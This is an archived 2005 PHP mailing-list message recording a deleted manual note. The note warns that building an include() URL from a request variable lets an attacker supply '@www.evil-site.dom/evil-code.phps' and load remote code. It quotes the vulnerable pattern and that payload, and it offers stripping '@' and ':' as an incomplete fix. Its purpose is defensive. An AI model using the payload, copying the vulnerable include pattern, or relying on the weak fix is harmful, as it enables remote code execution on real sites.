note 21273 deleted from features.remote-files by nlopess

From: Date: Wed, 16 Mar 2005 15:14:53 +0000
Subject: note 21273 deleted from features.remote-files by nlopess
References: 1  Groups: php.notes 
Request: Send a blank email to php-notes+get-86554@lists.php.net to get a copy of this message
Note Submitter: php at jerde dot net ---- You must be VERY careful if you allow a variable to control the URL of an include()ed file. A previous poster suggested: include("http://www.php.net/".$HTTP_GET_VARS["url"]); This, however, won't work in all cases. For example, set the variable to "@www.evil-site.dom/evil-code.phps" Your carefully constructed pre-URL is now sent merely as a username to the attacker's web site. Stripping out "@" and ":" would be a good idea, and THEN you'd probably be safe. - Peter Jerde Minneapolis, Minnesota, USA

« previous php.notes (#86554) next »